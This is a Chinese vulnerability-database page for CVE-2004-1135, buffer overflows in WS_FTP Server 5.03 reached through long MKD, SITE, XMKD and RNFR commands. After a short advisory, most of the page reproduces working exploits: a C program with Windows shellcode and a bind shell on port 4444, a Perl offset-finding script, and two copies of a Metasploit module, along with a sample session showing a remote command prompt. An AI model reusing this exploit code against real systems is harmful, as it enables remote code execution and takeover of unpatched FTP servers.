CVE-2004-1135
CVSS5.0
发布时间 :2005-01-10 00:00:00
修订时间 :2016-10-17 22:51:34
NMCOEP    

[原文]Multiple buffer overflows in WS_FTP Server 5.03 2004.10.14 allow remote attackers to cause a denial of service (service crash) via long (1) SITE, (2) XMKD, (3) MKD, and (4) RNFR commands.


[CNNVD]ipswitchft WS_FTP 多个 缓冲区溢出漏洞(CNNVD-200501-152)

        WS_FTP是一款FTP服务端软件。
        WS_FTP服务器5.03 2004.10.14中存在多个缓冲溢出漏洞。
        远程攻击者可以通过超长的SITE、XMKD、MKD和RNFR 命令导致服务崩溃,产生拒绝服务。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1135
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1135
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-152
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029600.html
(UNKNOWN)  FULLDISC  20041129 Multiple buffer overlows in WS_FTP Server Version 5.03, 2004.10.14.
http://marc.info/?l=bugtraq&m=110177654524819&w=2
(UNKNOWN)  BUGTRAQ  20041129 Multiple buffer overlows in WS_FTP Server Version 5.03, 2004.10.14.
http://www.securiteam.com/exploits/6D00L2KBPG.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/6D00L2KBPG.html
http://xforce.iss.net/xforce/xfdb/18296
(VENDOR_ADVISORY)  XF  wsftp-ftp-commands-bo(18296)

- 漏洞信息

ipswitchft WS_FTP 多个 缓冲区溢出漏洞
中危 缓冲区溢出
2005-01-10 00:00:00 2005-10-20 00:00:00
远程  
        WS_FTP是一款FTP服务端软件。
        WS_FTP服务器5.03 2004.10.14中存在多个缓冲溢出漏洞。
        远程攻击者可以通过超长的SITE、XMKD、MKD和RNFR 命令导致服务崩溃,产生拒绝服务。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.ipswitchft.com/Business/Products/WsFtpServer/

- 漏洞信息 (664)

WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit (EDBID:664)
windows dos
2004-11-29 Verified
0 NoPh0BiA
N/A [点击下载]
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)

*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <errno.h>

#define PORT 21
#define RPORT 4444
#define RET "\x53\x9B\x2E\x7C" /*win2k sp4*/

char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"\x94\x1d\x83\xeb\xfc\xe2\xf4\x4d\x56\xc2\x1d\xb1\xbe\xc7\x48\xe7"
"\xe9\x1f\x71\x95\xa6\x1f\x58\x8d\x35\xc0\x18\xc9\xbf\x7e\x96\xfb"
"\xa6\x1f\x47\x91\xbf\x7f\xfe\x83\xf7\x1f\x29\x3a\xbf\x7a\x2c\x4e"
"\x42\xa5\xdd\x1d\x86\x74\x69\xb6\x7f\x5b\x10\xb0\x79\x7f\xef\x8a"
"\xc2\xb0\x09\xc4\x5f\x1f\x47\x95\xbf\x7f\x7b\x3a\xb2\xdf\x96\xeb"
"\xa2\x95\xf6\x3a\xba\x1f\x1c\x59\x55\x96\x2c\x71\xe1\xca\x40\xea"
"\x7c\x9c\x1d\xef\xd4\xa4\x44\xd5\x35\x8d\x96\xea\xb2\x1f\x46\xad"
"\x35\x8f\x96\xea\xb6\xc7\x75\x3f\xf0\x9a\xf1\x4e\x68\x1d\xda\x30"
"\x52\x94\x1c\xb1\xbe\xc3\x4b\xe2\x37\x71\xf5\x96\xbe\x94\x1d\x21"
"\xbf\x94\x1d\x07\xa7\x8c\xfa\x15\xa7\xe4\xf4\x54\xf7\x12\x54\x15"
"\xa4\xe4\xda\x15\x13\xba\xf4\x68\xb7\x61\xb0\x7a\x53\x68\x26\xe6"
"\xed\xa6\x42\x82\x8c\x94\x46\x3c\xf5\xb4\x4c\x4e\x69\x1d\xc2\x38"
"\x7d\x19\x68\xa5\xd4\x93\x44\xe0\xed\x6b\x29\x3e\x41\xc1\x19\xe8"
"\x37\x90\x93\x53\x4c\xbf\x3a\xe5\x41\xa3\xe2\xe4\x8e\xa5\xdd\xe1"
"\xee\xc4\x4d\xf1\xee\xd4\x4d\x4e\xeb\xb8\x94\x76\x8f\x4f\x4e\xe2"
"\xd6\x96\x1d\xa0\xe2\x1d\xfd\xdb\xae\xc4\x4a\x4e\xeb\xb0\x4e\xe6"
"\x41\xc1\x35\xe2\xea\xc3\xe2\xe4\x9e\x1d\xda\xd9\xfd\xd9\x59\xb1"
"\x37\x77\x9a\x4b\x8f\x54\x90\xcd\x9a\x38\x77\xa4\xe7\x67\xb6\x36"
"\x44\x17\xf1\xe5\x78\xd0\x39\xa1\xfa\xf2\xda\xf5\x9a\xa8\x1c\xb0"
"\x37\xe8\x39\xf9\x37\xe8\x39\xfd\x37\xe8\x39\xe1\x33\xd0\x39\xa1"
"\xea\xc4\x4c\xe0\xef\xd5\x4c\xf8\xef\xc5\x4e\xe0\x41\xe1\x1d\xd9"
"\xcc\x6a\xae\xa7\x41\xc1\x19\x4e\x6e\x1d\xfb\x4e\xcb\x94\x75\x1c"
"\x67\x91\xd3\x4e\xeb\x90\x94\x72\xd4\x6b\xe2\x87\x41\x47\xe2\xc4"
"\xbe\xfc\xed\x3b\xba\xcb\xe2\xe4\xba\xa5\xc6\xe2\x41\x44\x1d";

struct sockaddr_in hrm;

void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;

while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);

if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}

if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}

int conn(char *ip,int p)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_addr.s_addr = inet_addr(ip);
hrm.sin_port = htons(p);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0)
{
perror("connect");
exit(0);
}

printf("[x] Connected to: %s on port %d.\n",ip,p);

return sockfd;
}

int main(int argc, char *argv[])
{
printf("***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***\n");
if(argc<4)
{
fprintf(stderr,"Usage: IP USER PASS\n");
exit(0);
}

char *buffer=malloc(954),*A=malloc(519),*B=malloc(32),*target=argv[1],*user=malloc(32),*pass=malloc(32),*request=malloc(32);
int x,y;
memset(request,'\0',32);
memset(user,'\0',32);
memset(pass,'\0',32);
memset(buffer,'\0',954);
memset(A,0x41,519);
memset(B,0x42,32);

strcpy(user,argv[2]);
strcpy(pass,argv[3]);

strcat(buffer,A);
strcat(buffer,RET);
strcat(buffer,B);
strcat(buffer,shellcode);

sprintf(request,"USER %s\r\nPASS %s\r\n",user,pass);

x = conn(target,PORT);
printf("[x] Sending Login..");
write(x,request,strlen(request));
printf("done.\n");
sleep(2);

printf("[x] Sending bad code..");
write(x,"MKD ",4);
write(x,buffer,954);
write(x,"\r\n",2);
printf("done.\n");
sleep(2);
close(x);
printf("[x] Checking if exploitation was successful..\n");
y=conn(target,RPORT);
printf("[x] 0wn3d!\n\n");
shell(y);
close(y);
}

/*
Helper script:
The following Perl script can be used to find the coordinates for A and B so that the RET address affects the EIP and the shellcode is executed.

#!/usr/bin/perl
# WS_FTP RET Address finder
# Noam Rathaus of Beyond Security Ltd.
#

use strict;
use IO::Socket::INET;

usage() unless (@ARGV >= 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";

$socket->autoflush(1);
while (<$socket>)
{
print $_;
if (/220 /)
{
last;
}
}

print $socket "USER noam\n";
while (<$socket>)
{
print $_;
if (/331 /)
{
last;
}
}

print $socket "PASS password\n";
while (<$socket>)
{
print $_;
if (/230 /)
{
last;
}
}

my $RET = 4;
my $size = 2000;
my $presize = shift(@ARGV) || 200;
my $postsize = shift(@ARGV) || 800;

print $socket "MKD ".("A"x$presize)."DEEF".("B"x($size - $presize - $postsize - $RET)).("C"x$postsize)."\n";

while (<$socket>)
{
print $_;
}

print "Done.\n";

close($socket);
exit(0);

sub usage
{
print "\nws_ftp.pl MKD aligment assistant\n";
print "\nUsage: ws_ftp.pl [host] [port] [pre] [post]\n";
print "We generate something of the sorts of \"A\"xpre \"DEEF\" \"B\"x(2000-pre-post-4) \"C\"xpost.\n";
print "You need to align your pre and post so that the EIP is DEEF 0x44454546\n";
print "\n";
exit(1);
}

*/

// milw0rm.com [2004-11-29]
		

- 漏洞信息 (16719)

WS-FTP Server 5.03 MKD Overflow (EDBID:16719)
windows remote
2010-10-05 Verified
21 metasploit
N/A [点击下载]
##
# $Id: wsftp_server_503_mkd.rb 10559 2010-10-05 23:41:17Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'WS-FTP Server 5.03 MKD Overflow',
			'Description'    => %q{
				This module exploits the buffer overflow found in the MKD
				command in IPSWITCH WS_FTP Server 5.03 discovered by Reed
				Arvin.
			},
			'Author'         => [ 'et', 'Reed Arvin <reedarvin@gmail.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10559 $',
			'Platform'       => [ 'win' ],
			'References'     =>
				[
					[ 'CVE', '2004-1135' ],
					[ 'OSVDB', '12509' ],
					[ 'BID', '11772'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 480,
					'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'WS-FTP Server 5.03 Universal',
						{
							'Ret'      => 0x25185bb8,
							# Address is executable to allow XP and 2K
							# 0x25185bb8 = push esp, ret (libeay32.dll)
							# B85B1825XX = mov eax,0xXX25185b
						},
					],
				],
			'DisclosureDate' => 'Nov 29 2004',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect
		if (banner =~ /5\.0\.3/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login

		print_status("Trying target #{target.name}...")

		buf         = rand_text_alphanumeric(8192)
		buf[498, 4] = [ 0x7ffd3001 ].pack('V')
		buf[514, 4] = [ target.ret ].pack('V')
		buf[518, 4] = [ target.ret ].pack('V')
		buf[522, 2] = make_nops(2)
		buf[524, payload.encoded.length] = payload.encoded

		send_cmd( ['MKD', buf], true );

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83216)

WS-FTP Server 5.03 MKD Overflow (PacketStormID:F83216)
2009-11-26 00:00:00
Efrain Torres,Reed Arvin  metasploit.com
exploit,overflow
CVE-2004-1135
[点击下载]

This Metasploit module exploits the buffer overflow found in the MKD command in IPSWITCH WS_FTP Server 5.03 discovered by Reed Arvin.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp
	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'WS-FTP Server 5.03 MKD Overflow',
			'Description'    => %q{
				This module exploits the buffer overflow found in the MKD
				command in IPSWITCH WS_FTP Server 5.03 discovered by Reed
				Arvin.
					
			},
			'Author'         => [ 'et', 'Reed Arvin <reedarvin@gmail.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-1135' ],
					[ 'OSVDB', '12509' ],
					[ 'BID', '11772'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 480,
					'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 
						'WS-FTP Server 5.03 Universal',
						{
							'Platform' => 'win',
							'Ret'      => 0x25185bb8,
							# Address is executable to allow XP and 2K
							# 0x25185bb8 = push esp, ret (libeay32.dll)
							# B85B1825XX = mov eax,0xXX25185b							
						},
					],
				],
			'DisclosureDate' => 'Nov 29 2004',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect	
		if (banner =~ /5\.0\.3/)
			return Exploit::CheckCode::Vulnerable
		end		
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect_login
		
		print_status("Trying target #{target.name}...")
		
		buf         = rand_text_alphanumeric(8192)
		buf[498, 4] = [ 0x7ffd3001 ].pack('V')		
		buf[514, 4] = [ target.ret ].pack('V')
		buf[518, 4] = [ target.ret ].pack('V')
		buf[522, 2] = make_nops(2)
		buf[524, payload.encoded.length] = payload.encoded
		
		send_cmd( ['MKD', buf], true );

		handler		
		disconnect
	end

end
    

- 漏洞信息

12509
WS_FTP Server Multiple Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified, Uncoordinated Disclosure

- 漏洞描述

A buffer overflow exists in WSFTP. The SITE, XMKD, MKD, and RNFR commands fail to validate user-supplied arguments resulting in a stack overflow. With a specially crafted command, an authenticated user can cause arbitrary code execution in the context of the FTP server resulting in a loss of integrity.

- 时间线

2004-11-29 Unknow
2004-11-29 Unknow

- 解决方案

Upgrade to version 5.04 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站